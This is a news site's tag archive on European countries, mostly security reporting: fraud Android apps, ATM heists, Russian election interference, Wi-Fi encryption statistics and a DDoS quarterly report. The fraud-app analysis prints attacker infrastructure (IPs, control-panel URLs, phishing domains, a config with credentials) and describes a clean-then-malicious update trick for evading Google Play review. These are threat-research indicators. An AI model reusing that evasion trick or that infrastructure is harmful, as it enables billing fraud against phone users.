Home Tags European countries

Tag: European countries

Microsoft’s Surface Book and Surface Studio will ship in more markets

Microsoft has been cautious about making its Surface product line available worldwide.
It tests devices in specific markets, sees how they do, and, if the response is good, ships them to those areas.The company appears to have have received a strong...

Finalists announced in European IT and Software Excellence Awards 2017

100+ companies from 28 countries represented amongst the finalists[London, 27 February 2017] The finalists for the European IT & Software Excellence Awards 2017 (www.iteawards.com) - the leading pan-European awards for ISVs, Solution Providers and Systems Integrators and their vendor and distributor partners – were announced today by IT Europa.

A total of 61 solution providers, 39 ISVs and 51 suppliers from 28 European countries have made the finals.

The winners will be announced at the... Source: RealWire

Data Protection Certification: Cloud Infrastructure Services Providers operating in Europe declare...

New compliance mark establishes data protection standards and practices to protect customer data and comply with European lawBrussels, 14th February 2017.

The Cloud Infrastructure Services Providers in Europe (CISPE), a coalition of cloud computing lea...

DDoS attacks in Q4 2016

2016 was the year of Distributed Denial of Service (DDoS) with major disruptions in terms of technology, attack scale and impact on our daily life.
In fact, the year ended with massive DDoS attacks unseen before, leveraging Mirai botnet technology.

Expensive free apps

This post is the result of collaboration between Elevenpaths (Telefónica Cyber Security Unit) and Kaspersky Lab.

Both companies have used their own expertise, researchers and tools, such as Tacyt (an innovative tool for the monitoring and analysis of mobile threats) and GReAT’s internal tools and resources.
Big Brother and Google Play Fraudulent apps trying to send Premium SMS messages or trying to call to high rate phone numbers are not something new.

Actually, it is easy to find them specially in Spain, Russia and some other european countries. Of course, it is much more interesting to talk about how certain groups bypass detection mechanisms such as those used by Google Play, since this has become difficult to achieve in the past few years. Some years ago it was pretty easy to upload a dialer (or other similar fraudulent app) to Google Play [1] [2], but new detection mechanisms made attacker to focus on alternative markets, at least for a period of time. Recently, we have found a Spanish group that successfully uploaded a non-official Big Brother (Gran Hermano) TV show app, which is one of the most popular TV shows in Spain even being on the air for 16 years now. [Analysis:cdd254ee6310331a82e96f32901c67c74ae12425] This was not a very sophisticated app, but they were able to upload it into Google Play using an old trick.

First, they uploaded a clean an innocuous version that of course passed or the security controls from Google Play.

Then, some days later, a new version was uploaded with a major features update, including subscription to paying services.

This trick was extremely simple but successful, since the app was in the Google Play for around two months (from mid September to mid November 2015). It seems this was not the first time this group tried to upload a Big Brother-like app. We have detected (via Tacyt [3]) at least another 4 similar applications that, regarding some particular logging messages we found in the code, could have the same origin: com.granhermano.gh16_1; from 2015-09-15 to 2015-09-22;com.granhermano162; from 2015-09-29 to 2015-11-14;com.granhermanodieciseis; from 2015-09-29 to 2015-11-11com.granh.gh16_3; from 2015-10-05 to 2015-10-15;com.hisusdk; from 2015-09-16 to 2015-11-14 (the one analyzed). As we said before, this group was found to be using a specific string “caca” as a logging tag, which is not something usual: The word “caca” is a colloquial word in Spanish referring to an excrement (very similar to the word “poo” in English). We could find it in certain testing code, referring to lines of code that should be removed later, but it is unusual to find it in such similar applications and used in the same way.

Because of that, it makes sense to think that those applications were developed by the same group. Other strings and function names used in the code make us conclude that those applications could be developer by native Spanish speakers. This app is using several commercial third party services such as Parse.com for the first network communication.

This first API call is used in order to get all the information necessary to run further actions (URLs, authentication, etc). {“results”:[{“Funcionamiento”:” Ahora la única pestaña importante es la de VOT.”,”action1″:”http://tempuri.org/getPinCode”,”action2″:”http://tempuri.org/crearSubscripcion”,”activa”:”si”,”createdAt”:”2015-09-08T16:17:24.550Z”,”estado”:true,”id_categoria”:”2608″,”id_subscripcion”:”400″,”metodo1″:”getPinCode”,”metodo2″:”crearSubscripcion”,”namespace”:”http://tempuri.org/”,”nombreApp”:”GH16 – españa”,”numero_corto”:”795059″,”numero_sms”:”+34911067088″,”objectId”:”tNREzkEocZ”,”password”:”15xw7v7u”,”updatedAt”:”2015-11-27T10:28:00.406Z”,”url”:”http://ws.alertas.aplicacionesmonsan.net/WebSubscription.asmx?WSDL”,”urlcode”:”http://spamea.me/getcode.php?code=”,”usuario”:”yourmob”,”vot”:true}]} As we can see above, it references to different URLs: spamea.me is service that no longer exists at the time of writing, but that used to be hosted on 107.6.184.212, which seems a hosting service shared with many other websites. ws.alertas.aplicacionesmonsan.net is legitimate service focused on mobile monetization, including SMS premium and direct carrier billing.
It is used from the app in order to subscribe the user to a service called “yourmob.com”. Of course, using paying services is not malicious itself, since it is legitimate that companies could bill for their services, but user should be clearly noticed about service cost and conditions beforehand. Despite we found a reference to “Terms and Conditions” (in Spanish) poiting to the website servimob.com , we could not verify that this information is shown to users and, anyway, users don’t have the opportunity to reject the agreement and don’t be subscribed. Presence outside Google Play It make sense that if a group have included this kind of app in Google Play, They were going to try something similar using other app sources (thanks to Facundo J.
Sánchez that spotted this). Analysis: 9b47070e65f81d253c2452edc5a0eb9cd17447f4 This app worked slightly different.
It uses other 3rd party services and it sends Premium SMSs for monetization.

They got from the server what number to use, for how many seconds and if the screen should be on or off. We found that they used very similar words for comments and method names (most of them in Spanish, including “caca”), same topic (Big Brother), references to “yourmob” and much more, so definitely we can link it with the Spanish group mentioned before. One of the webservices used by this application (http://104.238.188.38/806/) exposed a control panel showing information about people using this app: As you probably know, groups developing this kind of apps usually reuse their servers and supporting infrastructure for multiple apps, for example this one: https://www.virustotal.com/en-gb/file/cc2895442fce0145731b8e448d57e343d17ca0d4491b7fd452e6b9aaa4c2508a/analysis/ It was using this vps as well http://vps237553.ovh.net.
Some of the panels and services provided by the VPS were located here: http://vps237553.ovh.net/nexmo/getcode.php?code=http://vps237553.ovh.net/polonia/autodirect1.phphttp://vps237553.ovh.net/polonia/autodirect2.phphttp://vps237553.ovh.net/polonia/guardar_instalacion.phphttp://vps237553.ovh.net/polonia/guardar_numero.phphttp://vps237553.ovh.net/polonia/guardar_numero.php?androidID=http://vps237553.ovh.net/polonia/guardar_sms.phphttp://vps237553.ovh.net/polonia/push_recibido.phphttp://vps237553.ovh.net/polonia/panel.phphttp://vps237553.ovh.net/nexmo/ As we can see in their control panel, they have been quite successful in terms of spread, since there are registered phones from many different countries (Spain, Holland, Poland, etc). In addition, an iterative search on terms such as IP addresses, unique paths, etc, has shown that other apps could be using the same supporting infrastructure that was shown above, including the following IP addresses and domain names: In particular, 45.32.236.127 was pointed by different domain names in the past months: kongwholesaler.tk (2016-05-22) acc-facebook.com (2016-04-11) h-instagram.com (2016-04-11) msg-vk.com (2016-04-11) msg-google.ru (2016-04-10) msg-mail.ru (2016-04-10) iwantbitcoins.xyz (2015-11-04) These domains have probably been used for fraudulent initiatives such as phishing attacks, since they are very similar to well-known and legitimate services. Something that kept our attention was that “vps237553.ovh.net”, used from a sample and resolving to 51.255.199.164, was also used at some point (June 2016 regarding our passive DNS) by “servimob.com” domain (same domain referenced in the app from Google Play). Back to Google Play As you can imagine, they tried again to upload a new app to Google Play, following a similar philosophy and techniques that we have seen before. e49faf379b827ee8d3a777e69f3f9bd3e559ba0311a131c23e6427dd7e0e47280dd8f421febdc4f7 These apps were available in Google Play for a few weeks in September 2016, using similar techniques, especially to those applications that we found outside Google Play. Conclusions This Spanish group has been quite successful on uploading this kind of apps in Google Play, using interesting topics such as the Big Brother TV show.
Spain and Poland have been two countries traditionally targeted by SMS scams and similar malware. However, we have never seen in the past few years any group that was able to upload apps to legitimate markets in such an easy way. Perhaps the key point is that they try to be close enough to the border between a legitimate business and a malicious one.

Cybersecurity Expert Links Taiwan And Europe ATM Hacks

Group-IB says both attacks were likely carried out by Cobalt group using malware "ATM spitter." Cybersecurity firm Group-IB has linked the July Taiwan ATM cyber heist to the ATM hacking spree in Europe last year, claiming the two were carried out by the same hacking group, dubbed Cobalt. Reuters reports that Group-IB’s conclusion is based on the fact that the hack technique used in both incidents match. A group of 22 foreign nationals are alleged to be behind the First Commercial Bank ATM hack in Taiwan, of which three Eastern Europeans are in custody. Most of the stolen money was recovered and Taiwan authorities believe the bank network was breached at a London branch. According to a Group-IB report, the hackers used malware “ATM spitter” in the Taiwan attack as well as in similar hacks carried out in Britain, Russia, Poland, Spain, Bulgaria, and many other European countries, Reuters adds. Click here for the full story. Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events.

For more information from the original source of the news item, please follow the link provided in this article.
View Full Bio More Insights

Intel chiefs “even more resolute” on Russian election meddling findings

Enlarge / (L-R) Defense Undersecretary for Intelligence Marcell Lettre II, Director of National Intelligence James Clapper, and United States Cyber Command and National Security Agency Director Admiral Michael Rogers testify before the Senate Armed Services Committee.Chip Somodevilla / Getty Images reader comments 38 Share this story In a hearing before the Senate Armed Services Committee—a regularly scheduled unclassified briefing on "foreign cyber threats"—Director of National Intelligence James Clapper did very little to preview a report on Russian "cyber" activities around the US elections scheduled to be delivered to President Barack Obama this week.

Clapper did say that an unclassified version of the report would be released to the public early next week. However, that version is unlikely to contain any new specific evidence to support the intelligence community's assertions that the Russian government directed hacking and propaganda operations against Hillary Clinton and the Democratic Party in an attempt to deliberately affect the outcome of the US election. "We plan to brief the Congress and release an unclassified version of this report early next week, with due deference to the protection of highly fragile sources and methods," Clapper said in his opening statement. "We have invested billions, and we put people's lives at risk to get such information.
If we were to expose how we got this, we could just kiss that off. We're going to be as forthcoming as possible." Clapper and National Security Agency Director Admiral Michael Rogers both asserted, however, that the intelligence community was even more certain of Putin's involvement in the meddling in the US election than they were when the Department of Homeland Security (DHS) and the Office of the Director of National Intelligence issued a joint statement in October. "We stand more resolutely now on that statement than we did on the seventh of October," Clapper said. While Clapper said it was almost certain that no votes had been changed by hacking, he noted there was no way to determine the full impact of Russia's information campaign on voters' opinions—"We in the Intelligence Community can't tally that." Much of what Clapper and Rogers said in their testimony echoes data already available from commercial security firms and other sources, as well as the somewhat limited data shared in the DHS-FBI "joint analysis report" (JAR) issued last week.

The report to be delivered to the president will, however, take in the whole of the alleged Russian campaign to influence the election, including the use of Russian state-funded media, social media, and "fake news" to spread disinformation.

The report will likely also include specific data on how the intelligence community linked Putin to the sharing of breached data from the Democratic National Committee and others (including Clinton Campaign Chairman John Podesta) to Wikileaks. In response to a question from the committee on the role of "fake news" disinformation in Russia's election meddling, Clapper said, "Without getting too far in front of the headlights of [the upcoming report], this was a multifaceted campaign—the hacking was only one part of it.
It also entailed classical propaganda, disinformation, and fake news." Clapper acknowledged that the same sort of campaign was ongoing in Europe now, around the upcoming French and German elections. That mirrors forensic evidence that Ars has examined recently in our attempts to connect the dots between operations from the organization behind the "Fancy Bear" group of malware, tools and infrastructure used in the DNC, Democratic Congressional Campaign Committee, and Clinton campaign breaches, and the theft of data from the World Anti-Doping Agency (WADA).
Servers used in connection with some of the spear phishing attacks connected to these breaches have been also used to target French Gmail users recently. (More details of that activity and how it is connected to the information campaign against the Democrats in the US elections are being pulled together for an upcoming Ars report.) Many of the senators from both parties on the Armed Services Committee, including Sen. John McCain (R-Ariz.) and Senator Lindsey Graham (R-S.C.) threw barbs at President-elect Donald Trump for his treatment of the intelligence community and his posts apparently professing greater trust in Julian Assange than US intelligence.

Citing Assange as "the one responsible for publishing the names of people who worked for us" in Iraq and Afghanistan plus the subject of a criminal investigation, McCain asked Clapper and Rogers, "Do you think there's any credibility that we should attach to his statements?" Clapper replied frankly: "Not in my view." For his part, Donald Trump tried to back away from the appearance of endorsing Assange via Twitter: "The dishonest media likes saying that I am in Agreement with Julian Assange - wrong.
I simply state what he states, it is for the people.... to make up their own minds as to the truth.

The media lies to make it look like I am against "Intelligence" when in fact I am a big fan!" Graham was particularly angry at Trump for being overly critical and disrespectful of the intelligence community. "You don't want to undermine those people serving in this arena," he said. He also suggested Obama's sanctions against Russia amounted to "throwing pebbles" when it was time to "throw rocks," because the active campaign to interfere in the US election went far beyond passive espionage. Graham noted that Republicans should be concerned that someone else might do the same thing to them if Trump were to take on China or Iran, and the response to the Russian information operations was an opportunity to deter future interference in the democratic process. “It’s not like we’re so much better at cyber security than Democrats,” he said. Another area Graham focused on was the US Information Agency, the government operator of Radio Free Europe, and other US foreign information operations. He suggested this agency was too archaic in its focus on broadcasting.

Clapper agreed, saying in his closing remarks that what was needed to counter information warfare was a "USIA on steroids"—a new information organization that could take on misinformation from adversaries more aggressively in social media and other places online as well as in the broadcast realm. Russia has used the state-funded RT broadcast service and other outlets to more aggressively spread its version of the global narrative over the past few years.

The country has reportedly even used "troll factories" to create confusion and support nationalist populism in several European countries.

Germany warns Moscow will splash cash on pre-election propaganda and misinformation...

Top security agency issues warning ahead of 2017 poll Germany's intelligence agency has accused Russia of hacking its politicians and election systems under the guise of online activism. Federal Office for the Protection of the Constitution (BfV) chief Hans-Georg Maassen says Russia is intending to “weaken or destabilise the Federal Republic of Germany”. Germany's national election is expected in September 2017. Maassen says Russia is tipping money into misinformation campaigns in "aggressive and elevated" spying against "German Government officials, members of parliament, and employees of democratic parties". The BfV head says in a statement (PDF in German) that the Government is expecting more hacking in the run up to the elections. He says Russia has "enormous resources" and noted increased activity of known advanced hacking groups including Pawn Storm (Fancy Bear) said to be a state-sponsored entity. Maassen says citizen's reliance on social media makes them vulnerable to consuming fake news propaganda which he says is an "ideal gateway" for disinformation using bots to spread messages. Chief Hans-Georg Maassen It comes as US intelligence agencies accused Moscow of hacking and leaking information to deliberately discredit Democrat presidential contender Hillary Clinton, and compromising but withholding data stolen from the Republican National Committee. President-elect Donald Trump has rejected the "high confidence" assertion by the intelligence agencies. Russia has hit back with Dmitry Peskov, a spokesman for president Vladimir Putin, saying last month that the nation is also bracing for attacks during its next election, adding that Germany like all other European countries hacks other nation's infrastructure. Moscow has been blamed for the hacking and release of Democratic National Committee emails before the US presidential election.

But Moscow has strongly denied involvement in orchestrating cyberattacks on foreign soil and hit back with allegations of its own against the West. ® Sponsored: Want to know more about PAM? Visit The Register's hub

Research on unsecured Wi-Fi networks across the world

The very nature of wireless Wi-Fi networks means that hackers or criminals simply need to be located near an access point in order to eavesdrop and intercept network traffic. Poorly configured access point encryption or services that allow data to be sent without any encryption pose a serious threat to user data. Confidential data can be protected by encrypting traffic at wireless access points.
In fact, this method of protection is now considered essential for all Wi-Fi networks.

But what actually happens in practice? Is traffic always encrypted on public Wi-Fi networks? How does the situation differ from country to country? Kaspersky Security Network statistics can answer all these questions. We compared the situation with Wi-Fi traffic encryption in different countries using data from our threat database. We counted the number of reliable and unreliable networks in each country that has more than 10 thousand access points known to us (this obviously excludes Antarctica and other regions where there is not enough data to draw any conclusions). Security of Wireless Networks Using statistics from Kaspersky Security Network (KSN), we analyzed data from across the world for almost 32 million Wi-Fi hotspots accessed by the wireless adapters of KSN users. Encryption type used in public Wi-Fi hotspots across the world Approximately 24.7% of Wi-Fi hotspots in the world do not use any encryption at all.

This basically means that by using an antenna capable of sending and receiving data at 2.4 GHz, any individual located near an access point can easily intercept and store all user traffic and then browse it for data they are interested in.

Fortunately, modern online banking systems and messengers do not transfer unencrypted data.

But this is the only thing that prevents users of Wi-Fi networks with unencrypted traffic from revealing their passwords and other essential data when using an unsecure access point. The WEP (Wired Equivalent Privacy) protocol for encryption of data transferred over Wi-Fi is used by approximately 3.1% of all analyzed access points.

The protocol was the first to be created, quite a long time ago, and is now completely unreliable – it would take hackers just a few minutes to crack it.

From a data security point of view, using WEP is not much different from using open networks.

This protocol is being relegated to oblivion everywhere, but as we see from the chart above, it can still be found in use. Around three-quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA) protocol family.

The protocols from this family are currently the most secure.

The effort required to hack WPA depends on its settings, including the complexity of the password set by the hotspot owner.
It is worth noting that an attempt to decipher traffic from “personal” (WPA-Personal, PSK authentication) wireless networks (with public access points) can be made by intercepting the handshakes between the access point and the device at the beginning of the session. “Corporate” versions are protected from this sort of interception because they use internal company authorization. When it comes to “personal” WPA2 attacks, the situation is similar to that of WPA and mostly depends on the strength of the password set by the hotspot owner. It is only fair to note that during a standard attack on a Wi-Fi access point, a personal computer can generate from 50 to 300 keys per second on average.
If the encryption key is strong, it will take years to hack it.
Still, no one can guarantee that the key used at a cafe will be secure and that the attacker will have nothing but a PC at their disposal. Overall, it can be said that today’s WPA/WPA2 “non-enterprise” versions are reasonably, but not absolutely, secure.
In particular, they allow brute-force and dictionary attacks.

There are ready-to-use publicly available tools (aircrack-ng and similar software) for performing such attacks, as well as a large number of manuals. Geography of Unsecured Wi-Fi Access Points Share of Wi-Fi hotspots that use unreliable WEP or do not encrypt data (by country) We would like to note that the five countries with the highest proportion of unsecured connections include Korea (47.9% of unsecured Wi-Fi access points), while France (40.14%) and the US (39.31%) rate 9th and 12th respectively in the list. Germany appears to be the most secure among Western European countries, with 84.91% of access points secured by WPA/WPA2 protocol encryption. Share of Wi-Fi hotspots that use WPA/WPA2 (by country) However, even when using an encrypted connection, you should not completely rely upon this security measure.

There are several scenarios that could compromise even well-encrypted network traffic.

These include fake access points with names that duplicate or mimic real ones (for example, TrainStation_Free or TrainStation Free) and compromised routers forwarding traffic without encryption to attackers (malware tools that infect such devices are already “in the wild”).

At any rate, taking care of your own security is a good idea. Recommendations for Users There are several simple rules that help protect personal data when using open Wi-Fi networks in cafes, hotels, airports, and other public places. Do not trust networks that are not password-protected. Even if a network requests a password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection with the same password.

This allows them to easily steal personal user data. You should only trust network names and passwords given to you by employees of the establishment. To maximize your protection, turn off your Wi-Fi connection whenever you are not using it.

This will also save your battery life. We recommend disabling automatic connection to existing Wi-Fi networks too. If you are not 100% sure the wireless network you are using is secure, but you still need to connect to the internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely not perform any online banking operations or enter your bank card details anywhere. To avoid being a target for cybercriminals, you should enable the “Always use a secure connection” (HTTPS) option in your device settings.
It is recommended to enable this option when visiting any websites you think may lack the necessary protection. If possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning criminals won’t be able to read your data, even if they gain access to them. And, of course, you should use dedicated security solutions.

They inform users about any potential dangers when connecting to a suspicious Wi-Fi network and prevent any passwords or other confidential data from being compromised if there is a threat. One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security.

This module protects users connected to Wi-Fi networks by providing a secure encrypted connection channel.
Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (mail services, social networks, etc.).

Kaspersky DDOS intelligence report for Q3 2016

Q3 events Cybercrime as a Service In the last few months the scale of the global ‘Cybercrime as a Service’ infrastructure has been revealed – fully commercialized, with DDoS as one of the most popular services capable of launching attacks the likes of which have never seen before in terms of volume and technological complexity. Against this background, Europol published the 2016 Internet Organized Crime Threat Assessment (IOCTA) on 28 September, which is based on the experiences of law enforcement institutions within the EU member states.

The report clearly ranks DDoS in first place as a key threat and that any “Internet facing entity, regardless of its purpose or business, must consider itself and its resources to be a target for cybercriminals”. Most likely, this stems from early September when Brian Krebs, an industry security expert, published an investigation outlining the business operations of a major global DDoS botnet service called vDOS and its principal owners, two young men in Israel.

The culprits have been arrested and investigations are ongoing, but the sheer scale of their business is stunning. Based on a subscription scheme, starting from $19.99 per month, tens of thousands of customers paid more than $600,000 over the past two years to vDOS.
In just four months between April and July, vDOS launched more than 277 million seconds of attack time, or approximately 8.81 years’ worth of attack traffic. It was no wonder, that shortly afterwards a DDoS attack brought down Brian Krebs’s website with a traffic volume close to 620 Gbps, making it one of the biggest attacks the Internet has ever witnessed, only to be topped several days later by another attack close to 1 Tbps that hit France’s OVH.

The attack vector, as Octava Klaba, CTO at OVH reported, looks like the same Internet of Things (IoT) botnet totaling 152,464 devices – mainly webcams, routers and thermostats – that brought down Brian Krebs’s website. To make the situation even worse, hackers just released the Mirai source code, which, according to security experts, was responsible for the aforementioned DDoS attacks.

The code includes a built-in scanner to look for vulnerable IoT devices and enrolls them into a botnet. With this, we expect to see a new wave of commercial services like vDOS and DDoS attacks in the coming months. The Internet of Things is increasingly becoming a powerful tool for attackers, facilitated by the neglect for information security both on the part of vendors and users. So, check that your devices connected to the Internet have a strong security setup. ‘Political’ DDoS attacks DDoS is widely used in politics.
In July of this year, an international tribunal stated China’s territorial claims to the Spratly archipelago in the South China Sea were groundless, and almost immediately at least 68 sites belonging to various Philippine government institutions were subjected to powerful DDoS attacks.

The international press called these incidents part of a long-term cyberespionage campaign launched by China in its struggle for sovereignty of the Spratly archipelago. Attack on a broker Cybercriminals have identified the most vulnerable targets for DDoS extortion purposes – broker companies.

They are high-turnover businesses that are also extremely dependent on web services.

The Taiwanese company First Securities recently received a demand for 50 bitcoins (about $32,000) from unknown persons.

After refusing to pay, the company’s website was targeted by a DDoS attack, which made bidding for the company’s clients impossible. Meanwhile, the president of First Securities released a statement to the press saying they had experienced a “trade slowdown” that only affected some of their investors. Assessing the damage caused by DDoS attacks B2B International, at the request of Kaspersky Lab, conducted the study called IT Security Risks 2016.

According to the results, corporations are suffering increasing damage from DDoS attacks: a single attack can cost a company more than $1.6 billion in losses.

At the same time, 8 out of 10 companies are subjected to several attacks per year. Trend of the quarter: SSL-based DDoS attacks According to Kaspersky DDoS Protection, the number of “smart” HTTPS-based DDoS attacks on applications increased in the third quarter of 2016.

These attacks boast a number of important advantages that make a successful attack more likely. Establishing a secure connection requires considerable resources, despite operating speeds for cryptographic algorithms constantly increasing (e.g., the elliptic curve algorithm has made it possible to enhance the performance of encryption while maintaining the persistence level).

For the sake of comparison, a properly configured web server is capable of processing tens of thousands of new HTTP connections per second, but when processing encrypted connections this capacity falls to just hundreds of connections per second. The use of hardware crypto accelerators makes it possible to significantly increase this value. However, this doesn’t help much considering the current reality of cheap and readily available rented servers, high-capacity communication channels, as well as known vulnerabilities that allow cybercriminals to build larger botnets.

They can carry out a successful DDoS attack by creating a load that exceeds the performance of expensive hardware solutions. A typical example of a “smart” attack is a relatively small number of queries being sent to the “load-heavy” parts of websites (as a rule, search forms are chosen) inside a small number of encrypted connections.

Those requests are almost invisible in the overall traffic flow, and at a low intensity they are often very effective.

At the same time, decryption and analysis of traffic is only possible on the web-server side. Encryption also complicates the operation of specialized systems designed to protect against DDoS attacks (especially solutions used by communications providers).

Decrypting traffic on-the-fly in order to analyze the content of network packets is often not possible during such attacks due to technical or security reasons (it’s not permitted to pass a server’s private key to third-party organizations, mathematical limitations prevent access to the information in encrypted packets in transit traffic).

This significantly reduces the effectiveness of protection against such attacks. The growing proportion of “smart” DDoS attacks is caused in no small part by the fact that amplification-type attacks, the most popular attack type in recent times, are becoming increasingly difficult to implement. On the Internet, the number of vulnerable servers that can be used to organize such attacks is steadily falling.
In addition, most of these attacks have similar features, making it easy to block them completely, and ensuring their effectiveness is eroded over time. The desire of website owners to protect data and improve privacy levels, combined with cheaper computing capacities have resulted in a growing trend: classic HTTP is being replaced by HTTPS, leading to an increase in the proportion of resources using encryption.

The development of web-based technology encourages active implementation of the new HTTP/2 protocol, in which operations without encryption are not supported by the latest browsers. We believe that the number of encryption-based attacks will grow.

For developers of information security solutions this requires an immediate reappraisal of their approach to combating distributed attacks, because today’s tried and tested solutions may soon become ineffective. Statistics for botnet-assisted DDoS attacks Methodology Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity.

The company’s experts monitor botnet activity with the help of the DDoS Intelligence system. DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data. This report contains the DDoS Intelligence statistics for the third quarter of 2016. In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours.
If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack.

Attacks on the same web resource from two different botnets are also regarded as separate attacks. The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses.
In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics. It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab.
It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period. Q3 Summary Resources in 67 countries (vs. 70 in Q2) were targeted by DDoS attacks in Q3 2016. 62.6% of targeted resources were located in China. China, the US and South Korea remained leaders in terms of both the number of DDoS attacks and number of targets.

For the first time both rankings included Italy. The longest DDoS attack in Q3 2016 lasted for 184 hours (or 7.6 days) – significantly shorter than the previous quarter’s maximum (291 hours or 12.1 days). A popular Chinese search engine was subjected to the largest number of attacks (19) over the reporting period. SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios.

The proportion of attacks using the SYN DDoS method continued to grow, increasing by 5 p.p., while the shares of TCP DDoS and HTTP DDoS continued to decline. In Q3 2016, the percentage of attacks launched from Linux botnets continued to increase and reached 78.9% of all detected attacks. Geography of attacks In Q3 2016, the geography of DDoS attacks narrowed to 67 countries, with China accounting for 72.6% (4.8 p.p. less than the previous quarter).
In fact, 97.4% of the targeted resources were located in just 10 countries.

The other two countries in the top three switched places – the US (12.8%) overtook South Korea (6.3%) to become the second most targeted country. Distribution of DDoS attacks by country, Q2 2016 vs. Q3 2016 One entry of note to the rating of most targeted countries was Italy, appearing for the first time ever and accounting for 0.6% of all attacks.
In all, the TOP 10 included three Western European countries (Italy, France and Germany). This quarter’s statistics show that targets within the leading 10 countries accounted for 96.9% of all attacks. Distribution of unique DDoS attack targets by country, Q2 2016 vs. Q3 2016 In Q3 2016, 62.6% of attacks (8.7 p.p. less than the previous quarter) targeted resources located in China. However, targets in the US became more attractive for cybercriminals – the country’s share accounted for 18.7% compared with 8.9% in the previous quarter.
South Korea rounded off the top three – its contribution decreased by 2.4 p.p. and amounted to 8.7%. The shares of the other countries in the TOP 10 increased, with the exception of France (0.4%), which saw a fall of 0.1 p.p. Japan (1.6%) and Italy (1.1%) each saw a 1 p.p. increase, and as a result, Italy entered the TOP 10 for the first time and went straight in at 6th place (Ukraine left the TOP 10).

The proportion of attacks targeting Russia also grew significantly – from 0.8% to 1.1%. This rating also included three Western European countries – Italy, France and the Netherlands. Changes in DDoS attack numbers DDoS activity was relatively uneven in Q3 2016.

The period between 21 July and 7 August was marked by the highest DDoS activity, with peaks in the number of attacks registered on 23 July and 3 August.

From 8 August, DDoS activity plummeted and resulted in a lull which lasted from 14 August till 6 September.

The smallest number of attacks was recorded on 3 September (22 attacks).

The largest number of attacks was observed on 3 August – 1,746 attacks. Note that this is the highest figure for the first three quarters of 2016. Most of these attacks took place on the servers of just one service provider located in the United States. Number of DDoS attacks over time* in Q3 2016 *DDoS attacks may last for several days.
In this timeline, the same attack can be counted several times, i.e. one time for each day of its duration.
In Q3, Friday was the most active day of the week for DDoS attacks (17.3% of attacks), followed by Thursday (15.2%). Monday, which was second in Q2 with 15%, became the quietest day of the week in terms of DDoS attacks (12.6%). Distribution of DDoS attack numbers by day of the week, Q2 and Q3 2016 Types and duration of DDoS attacks The rating of the most popular attack methods saw no considerable changes from the previous quarter.

The SYN DDoS method has further strengthened its position as leader: its share increased from 76% to 81%.

The proportion of the other attack types decreased slightly.
ICMP DDoS was most affected: its share decreased by 2.6 p.p. Distribution of DDoS attacks by type, Q2 and Q3 2016 Attacks that last no more than four hours remained the most popular: in Q3 their share increased by 9.2 p.p., accounting for 69%.

Attacks that lasted 5-9 hours remained in second. Meanwhile, the percentage of longer attacks decreased considerably – the share of attacks lasting 100-149 hours fell from 1.7% in Q2 to 0.1% in the third quarter.

There were very few cases of attacks lasting longer than that. Distribution of DDoS attacks by duration (hours), Q2 and Q3 2016 The longest DDoS attack in Q3 2016 only lasted for 184 hours (targeting a Chinese provider), which is significantly lower than the Q2 maximum of 291 hours. A Chinese search engine had the unenviable distinction of being attacked most – it was targeted 19 times during the quarter. C&C servers and botnet types In Q3, the highest number of C&C servers (45.8%) was detected in South Korea, although this country’s contribution is considerably smaller compared to the previous quarter (69.6%). The top three countries hosting the most C&C servers remained unchanged – South Korea, China and the US – although their total share was 67.7% vs. 84.8% in Q2. The number of active C&C servers in Western Europe is growing – the TOP 10 included the Netherlands (4.8%), the UK (4.4%), and France (2%).

To recap, three Western European countries entered both the TOP 10 countries subjected to the highest number of attacks and the TOP 10 countries with the highest number of targets. Among the newcomers to the C&C rating were Hong Kong and Ukraine, each with a share of 2%. Distribution of botnet C&C servers by country in Q3 2016 In Q3, Linux-based DDoS bots remained the clear leader and the share of attacks launched from Linux botnets continued to grow, accounting for 78.9% vs. 70.8% in Q2.

This correlates with the growing popularity of SYN DDoS for which Linux bots are the most appropriate tool.
In addition, this can be explained by the growing popularity of Linux-based IoT devices used for DDoS attacks, and will most probably be boosted further after the leakage of Mirai. Correlation between attacks launched from Windows and Linux botnets, Q2 and Q3 2016 Q3 continues the trend of Linux dominance from the previous quarter. Prior to Q2 2016, the difference between the share of Windows- and Linux-based botnets did not exceed 10 p.p. for several quarters in a row. The majority of attacks – 99.8% – were carried out by bots belonging to a single family.

Cybercriminals launched attacks using bots from two different families in just 0.2% of cases. Conclusion ‘Classic’ botnet attacks based on widespread malware tools such as Pandora, Drive, etc. have been well researched by analysts who have developed effective and simple methods of neutralizing attacks that utilize these tools.

This is increasingly forcing cybercriminals to use more sophisticated attack methods, including data encryption and new approaches to the development of tools used for organizing attacks and building botnets. Another interesting trend this quarter was the increased activity of DDoS botnets in Western Europe.

For the first time in a year the TOP 10 most attacked countries included three Western European countries – Italy, France and Germany.

This correlates with the increased number of active C&C servers in Western Europe, particularly in France, the UK and the Netherlands. Overall, Western European countries accounted for about 13% of active DDoS botnet C&C servers.

Europe loves to pay by bonk* – survey

